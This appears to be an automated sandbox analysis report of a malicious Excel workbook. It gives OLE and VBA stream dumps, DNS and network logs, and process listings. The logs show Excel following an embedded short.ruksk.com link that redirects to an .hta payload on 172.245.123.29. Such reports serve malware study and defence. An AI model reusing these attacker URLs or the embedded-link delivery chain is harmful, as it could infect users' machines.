                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                            CLSID:
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:468
                            Entropy:5.269289820125323
                            Base64 Encoded:True
                            Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                            Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                            CLSID:
                            File Type:data
                            Stream Size:83
                            Entropy:3.0672749060249043
                            Base64 Encoded:False
                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                            CLSID:
                            File Type:data
                            Stream Size:2486
                            Entropy:3.9244127831265385
                            Base64 Encoded:False
                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                            CLSID:
                            File Type:data
                            Stream Size:536
                            Entropy:6.330646364694152
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                            Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                            General
                            Stream Path:MBD00016416/MBD00726B69/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.219515110876372
                            Base64 Encoded:False
                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00016416/MBD00726B69/Package
                            CLSID:
                            File Type:Microsoft Excel 2007+
                            Stream Size:26242
                            Entropy:7.635424485665502
                            Base64 Encoded:True
                            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00016416/Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:283872
                            Entropy:7.743278150467805
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                            General
                            Stream Path:MBD00016417/\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:694
                            Entropy:4.330652164987259
                            Base64 Encoded:False
                            Data ASCII:. . . . . ^ ^ . s . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . h . o . r . t . . . r . u . k . s . k . . . c . o . m . / . 2 . Z . P . t . 3 . M . ? . & . c . h . a . n . c . e . = . w . e . a . l . t . h . y . & . g . u . i . d . e . = . e . n . c . o . u . r . a . g . i . n . g . & . p . r . e . s . i . d . e . n . t . = . a . l . o . o . f . & . c . o . n . d . u . c . t . o . r . = . c . u . t . e . & . b . e . v . e . r . a . g . e . . . B . ^ p . g . . . . . . .
                            Data Raw:01 00 00 02 d3 18 f7 5e 5e cc a7 73 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e4 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 68 00 6f 00 72 00 74 00 2e 00 72 00 75 00 6b 00 73 00 6b 00 2e 00 63 00 6f 00 6d 00 2f 00 32 00 5a 00 50 00 74 00 33 00 4d 00 3f 00 26 00 63 00 68 00 61 00 6e 00 63 00 65 00 3d 00 77 00
                            General
                            Stream Path:Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:335353
                            Entropy:7.998693399413816
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . h G ) D c . . # e d [ i p . ] r ( L . D . ] . I | . . . . . . . . . . . . . . \\ . p . . U ? r | t " / . > l . V ^ ' Q G . + ' . A . S % G | 2 + 7 . 9 W ^ B ` . s . x . . } . T . $ 0 ( m N | . . v M b ( = . ? [ _ B . . . ) > a . . . . 9 . . . = . . . o B . . . . . . . w - " h . C . . . \\ . . . . G . . . . L . . . . . . . . 1 . . . $ . = . . . 9 B b | z " . $ a . Q . ] @ . . . . ! . . . l " . . . . . . . . . $ . . . . . { . . . . 1 . . . e K . C t 7 + p
                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 f4 da 96 fb 68 47 29 fa b3 44 63 f5 12 b6 14 23 90 65 64 ab 5b 69 94 70 e6 e7 0c 83 ec 5d b3 72 28 ad 4c 0d 44 c0 d0 7f 81 5d c9 0b f2 83 49 7c 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 0f e5 e2 00 00 00 5c 00 70 00 ba f4 93 d1 b2 55 3f 72 9f 7c 74 22 2f 01 3e c1 a2 6c 99 a5 2e 56 b3 5e a2 27
                            General
                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                            CLSID:
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:529
                            Entropy:5.224482078150177
                            Base64 Encoded:True
                            Data ASCII:I D = " { C 8 F B 9 E A 0 - 5 A E 8 - 4 5 2 1 - 9 A B 2 - F 3 A 0 5 B 3 6 D 7 C 9 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 2 3 0 3 E B E C 4 C 2 C 4 C 2 C
                            Data Raw:49 44 3d 22 7b 43 38 46 42 39 45 41 30 2d 35 41 45 38 2d 34 35 32 31 2d 39 41 42 32 2d 46 33 41 30 35 42 33 36 44 37 43 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                            General
                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                            CLSID:
                            File Type:data
                            Stream Size:104
                            Entropy:3.0488640812019017
                            Base64 Encoded:False
                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                            CLSID:
                            File Type:data
                            Stream Size:2644
                            Entropy:3.994480955010925
                            Base64 Encoded:False
                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                            CLSID:
                            File Type:data
                            Stream Size:553
                            Entropy:6.372707223815173
                            Base64 Encoded:True
                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 0 j i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 b8 30 6a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Dec 10, 2024 06:48:29.833172083 CET | 49814 | 443 | 192.168.2.5 | 54.150.207.131
                            Dec 10, 2024 06:48:29.833209991 CET | 443 | 49814 | 54.150.207.131 | 192.168.2.5
                            Dec 10, 2024 06:48:29.833277941 CET | 49814 | 443 | 192.168.2.5 | 54.150.207.131
                            Dec 10, 2024 06:48:29.833571911 CET | 49814 | 443 | 192.168.2.5 | 54.150.207.131
                            Dec 10, 2024 06:48:29.833590984 CET | 443 | 49814 | 54.150.207.131 | 192.168.2.5
                            Dec 10, 2024 06:48:31.411421061 CET | 443 | 49814 | 54.150.207.131 | 192.168.2.5
                            Dec 10, 2024 06:48:31.411528111 CET | 49814 | 443 | 192.168.2.5 | 54.150.207.131
                            Dec 10, 2024 06:48:31.419329882 CET | 49814 | 443 | 192.168.2.5 | 54.150.207.131
                            Dec 10, 2024 06:48:31.419348955 CET | 443 | 49814 | 54.150.207.131 | 192.168.2.5
                            Dec 10, 2024 06:48:31.419711113 CET | 443 | 49814 | 54.150.207.131 | 192.168.2.5
                            Dec 10, 2024 06:48:31.419764996 CET | 49814 | 443 | 192.168.2.5 | 54.150.207.131
                            Dec 10, 2024 06:48:31.420747995 CET | 49814 | 443 | 192.168.2.5 | 54.150.207.131
                            Dec 10, 2024 06:48:31.467329979 CET | 443 | 49814 | 54.150.207.131 | 192.168.2.5
                            Dec 10, 2024 06:48:32.090646982 CET | 443 | 49814 | 54.150.207.131 | 192.168.2.5
                            Dec 10, 2024 06:48:32.090720892 CET | 443 | 49814 | 54.150.207.131 | 192.168.2.5
                            Dec 10, 2024 06:48:32.090751886 CET | 49814 | 443 | 192.168.2.5 | 54.150.207.131
                            Dec 10, 2024 06:48:32.090775013 CET | 49814 | 443 | 192.168.2.5 | 54.150.207.131
                            Dec 10, 2024 06:48:32.095455885 CET | 49814 | 443 | 192.168.2.5 | 54.150.207.131
                            Dec 10, 2024 06:48:32.095468998 CET | 443 | 49814 | 54.150.207.131 | 192.168.2.5
                            Dec 10, 2024 06:48:32.097338915 CET | 49820 | 80 | 192.168.2.5 | 172.245.123.29
                            Dec 10, 2024 06:48:32.217798948 CET | 80 | 49820 | 172.245.123.29 | 192.168.2.5
                            Dec 10, 2024 06:48:32.217892885 CET | 49820 | 80 | 192.168.2.5 | 172.245.123.29
                            Dec 10, 2024 06:48:32.218101978 CET | 49820 | 80 | 192.168.2.5 | 172.245.123.29
                            Dec 10, 2024 06:48:32.337496996 CET | 80 | 49820 | 172.245.123.29 | 192.168.2.5
                            Dec 10, 2024 06:48:33.352997065 CET | 80 | 49820 | 172.245.123.29 | 192.168.2.5
                            Dec 10, 2024 06:48:33.353115082 CET | 49820 | 80 | 192.168.2.5 | 172.245.123.29
                            Dec 10, 2024 06:48:38.358745098 CET | 80 | 49820 | 172.245.123.29 | 192.168.2.5
                            Dec 10, 2024 06:48:38.358810902 CET | 49820 | 80 | 192.168.2.5 | 172.245.123.29
                            Dec 10, 2024 06:49:29.355057001 CET | 49820 | 80 | 192.168.2.5 | 172.245.123.29
                            Dec 10, 2024 06:49:29.474443913 CET | 80 | 49820 | 172.245.123.29 | 192.168.2.5
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Dec 10, 2024 06:48:29.458331108 CET | 52563 | 53 | 192.168.2.5 | 1.1.1.1
                            Dec 10, 2024 06:48:29.832369089 CET | 53 | 52563 | 1.1.1.1 | 192.168.2.5
                            Dec 10, 2024 06:48:49.761110067 CET | 54511 | 53 | 192.168.2.5 | 1.1.1.1
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Dec 10, 2024 06:48:29.458331108 CET | 192.168.2.5 | 1.1.1.1 | 0xc496 | Standard query (0) | short.ruksk.com | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:48:49.761110067 CET | 192.168.2.5 | 1.1.1.1 | 0x85b6 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Dec 10, 2024 06:47:43.027987003 CET | 1.1.1.1 | 192.168.2.5 | 0x5461 | No error (0) | svc.ha-teams.office.com | mira-tmc.tm-4.office.com | | CNAME (Canonical name) | IN (0x0001) | false
                            Dec 10, 2024 06:47:43.027987003 CET | 1.1.1.1 | 192.168.2.5 | 0x5461 | No error (0) | mira-tmc.tm-4.office.com | | 52.123.243.178 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:47:43.027987003 CET | 1.1.1.1 | 192.168.2.5 | 0x5461 | No error (0) | mira-tmc.tm-4.office.com | | 52.123.243.182 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:47:43.027987003 CET | 1.1.1.1 | 192.168.2.5 | 0x5461 | No error (0) | mira-tmc.tm-4.office.com | | 52.123.243.185 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:47:43.027987003 CET | 1.1.1.1 | 192.168.2.5 | 0x5461 | No error (0) | mira-tmc.tm-4.office.com | | 52.123.243.176 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:47:43.027987003 CET | 1.1.1.1 | 192.168.2.5 | 0x5461 | No error (0) | mira-tmc.tm-4.office.com | | 52.123.243.186 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:47:43.027987003 CET | 1.1.1.1 | 192.168.2.5 | 0x5461 | No error (0) | mira-tmc.tm-4.office.com | | 52.123.243.184 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:47:43.027987003 CET | 1.1.1.1 | 192.168.2.5 | 0x5461 | No error (0) | mira-tmc.tm-4.office.com | | 52.123.243.177 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:47:43.027987003 CET | 1.1.1.1 | 192.168.2.5 | 0x5461 | No error (0) | mira-tmc.tm-4.office.com | | 52.123.243.183 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:47:45.038223028 CET | 1.1.1.1 | 192.168.2.5 | 0xe5de | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:47:45.038223028 CET | 1.1.1.1 | 192.168.2.5 | 0xe5de | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:47:51.903455019 CET | 1.1.1.1 | 192.168.2.5 | 0x1c7a | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                            Dec 10, 2024 06:47:51.903455019 CET | 1.1.1.1 | 192.168.2.5 | 0x1c7a | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:48:29.832369089 CET | 1.1.1.1 | 192.168.2.5 | 0xc496 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:48:49.990004063 CET | 1.1.1.1 | 192.168.2.5 | 0x85b6 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
                            Dec 10, 2024 06:48:50.300677061 CET | 1.1.1.1 | 192.168.2.5 | 0x84a2 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                            Dec 10, 2024 06:48:50.300677061 CET | 1.1.1.1 | 192.168.2.5 | 0x84a2 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                            • short.ruksk.com
                            • 172.245.123.29
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.5 | 49820 | 172.245.123.29 | 80 | 7404 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            Dec 10, 2024 06:48:32.218101978 CET | 265 | OUT | GET /221/wcc/shewithmegoodthingstogetmebackwithentirelifeiloveherwithheart.hta HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Connection: Keep-Alive
                            Host: 172.245.123.29
                            Dec 10, 2024 06:48:33.352997065 CET | 541 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 10 Dec 2024 05:48:33 GMT
                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                            Content-Length: 300
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=iso-8859-1
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 172.245.123.29 Port 80</address></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.5 | 49814 | 54.150.207.131 | 443 | 7404 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            2024-12-10 05:48:31 UTC | 273 | OUT | GET /2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverage HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Host: short.ruksk.com
                            Connection: Keep-Alive
                            2024-12-10 05:48:32 UTC | 509 | IN | HTTP/1.1 302 Found
                            Date: Tue, 10 Dec 2024 05:48:31 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            X-DNS-Prefetch-Control: off
                            X-Frame-Options: SAMEORIGIN
                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                            X-Download-Options: noopen
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            Location: http://172.245.123.29/221/wcc/shewithmegoodthingstogetmebackwithentirelifeiloveherwithheart.hta
                            Vary: Accept
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 117
                            Connection: close
                            2024-12-10 05:48:32 UTC | 117 | IN | Data Ascii: Found. Redirecting to http://172.245.123.29/221/wcc/shewithmegoodthingstogetmebackwithentirelifeiloveherwithheart.hta


                            Target ID:0
                            Start time:00:47:36
                            Start date:10/12/2024
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Imagebase:0xf60000
                            File size:53'161'064 bytes
                            MD5 hash:4A871771235598812032C822E6F68F19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:5
                            Start time:00:48:38
                            Start date:10/12/2024
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding
                            Imagebase:0x7ff686a00000
                            File size:5'641'176 bytes
                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:00:48:40
                            Start date:10/12/2024
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                            Imagebase:0x7ff6413e0000
                            File size:3'581'912 bytes
                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:00:48:40
                            Start date:10/12/2024
                            Path:C:\Windows\splwow64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\splwow64.exe 12288
                            Imagebase:0x7ff6741f0000
                            File size:163'840 bytes
                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:00:48:40
                            Start date:10/12/2024
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Wow64 process (32bit):false
